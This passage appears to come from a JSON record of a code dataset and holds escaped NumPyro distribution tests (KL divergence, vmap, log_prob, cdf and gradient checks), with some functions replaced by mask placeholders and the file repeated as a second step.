roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\n<mask token>\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef 
_tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\n<mask token>\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-2": "<mask token>\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = *ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1]\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\n<mask token>\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\n<mask token>\n\n\nclass T(namedtuple('TestCase', ['jax_dist', 'sp_dist', 'params'])):\n\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\n<mask token>\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < '1.6.0':\n pytest.skip(\n 'Multivariate Student-T distribution is not available in scipy < 1.6'\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\n<mask token>\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n<mask token>\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n lower, upper = np.array([-math.pi, -math.pi]), np.array([math.pi,\n math.pi])\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0]), np.array([1.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n<mask token>\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0, -1.234]), np.array([1.0, 10.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(self:\n SineSkewedVonMisesBatched, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc,\n scale=scale)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n 
_component_distribution=component_distribution)\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(loc=loc, covariance_matrix\n =covariance_matrix)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [dist.Normal(loc=loc_, scale=scale_) for loc_,\n scale_ in zip(locs, scales)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [vmap_over(d, loc=locs, scale=scales) for d in\n self.component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [dist.MultivariateNormal(loc=loc_,\n covariance_matrix=covariance_matrix) for loc_,\n covariance_matrix in zip(locs, covariance_matrices)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [vmap_over(d, loc=locs) for d in self.\n component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {'rate': constraints.positive, 'gate_logits':\n constraints.real}\n pytree_data_fields = 'rate',\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), 
gate_logits, validate_args=\n validate_args)\n\n\n<mask token>\n\n\nclass SparsePoisson(dist.Poisson):\n\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: 'FoldedNormal', loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(self, base_dist=\n vmap_over(self.base_dist, loc=loc, scale=scale))\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = ['loc', 'correlation', 'conditional_precision']\n\n def __init__(self, loc, correlation, conditional_precision, adj_matrix,\n *, is_sparse=True, validate_args=None):\n super().__init__(loc, correlation, conditional_precision,\n adj_matrix, is_sparse=True, validate_args=validate_args)\n\n\n<mask token>\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\n<mask token>\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = (prepend_shape + jax_dist.batch_shape + jax_dist.\n event_shape)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if sp_dist and not _is_batched_multivariate(jax_dist) and not isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif sp_dist and not _is_batched_multivariate(jax_dist) and isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = 1 if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\n \"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.\n MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(jax_dist.precision_matrix, jnp.linalg.inv(jax_dist.\n covariance_matrix), rtol=1e-06)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, 'shape', ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist\n ).infer_shapes(*shapes)\n except NotImplementedError:\n pytest.skip(\n f'{type(jax_dist).__name__}.infer_shapes() is not implemented')\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email 
protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(\n constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.\n reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n gamma_derived_params = {'Gamma': ['concentration'], 'Beta': [\n 'concentration1', 'concentration0'], 'BetaProportion': ['mean',\n 'concentration'], 'Chi2': ['df'], 'Dirichlet': ['concentration'],\n 'InverseGamma': ['concentration'], 'LKJ': ['concentration'],\n 'LKJCholesky': ['concentration'], 'StudentT': ['df']}.get(jax_dist.\n __name__, [])\n dist_args = [p for p in (inspect.getfullargspec(jax_dist.__init__)[0][1\n :] if inspect.isclass(jax_dist) else inspect.getfullargspec(\n jax_dist)[0])]\n params_dict = dict(zip(dist_args[:len(params)], params))\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [p for p in jax_class.reparametrized_params if \n p not in gamma_derived_params]\n if not reparametrized_params:\n pytest.skip('{} not reparametrized.'.format(jax_class.__name__))\n nonrepara_params_dict = {k: v for k, v in params_dict.items() if k not in\n reparametrized_params}\n repara_params = tuple(v for k, v in params_dict.items() if k in\n reparametrized_params)\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(jax_dist(**args_dict, **nonrepara_params_dict).\n sample(key=rng_key))\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n eps = 0.001\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(\n repara_params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(\n repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02,\n atol=0.03)\n\n\[email protected]('jax_dist, params', [(dist.Gamma, (1.0,)), (dist.\n Gamma, (0.1,)), (dist.Gamma, (10.0,)), (dist.Chi2, (1.0,)), (dist.Chi2,\n (0.1,)), (dist.Chi2, (10.0,)), (dist.Beta, (1.0, 1.0)), (dist.StudentT,\n (5.0, 2.0, 4.0))])\ndef 
test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n 
rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\n<mask token>\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = 
dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in 